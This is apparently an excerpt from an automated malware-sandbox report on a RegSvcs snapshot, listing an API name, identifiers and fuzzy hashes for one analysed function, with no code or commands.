                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0$0
                                                              • API String ID: 3446177414-203156872
                                                              • Opcode ID: 645884f6751fc2d1a4672aec50a9a4a37833dc3d95341e19efe103e93b28b76d
                                                              • Instruction ID: 355a87748421e903e8bfaa6cac84f108c95d7859f26cdc417302e68e910109f0
                                                              • Opcode Fuzzy Hash: 645884f6751fc2d1a4672aec50a9a4a37833dc3d95341e19efe103e93b28b76d
                                                              • Instruction Fuzzy Hash: 5F418DB26087069FC311CF6DC484A56BBE5BB88308F04492EFA88DB751D731E909CB82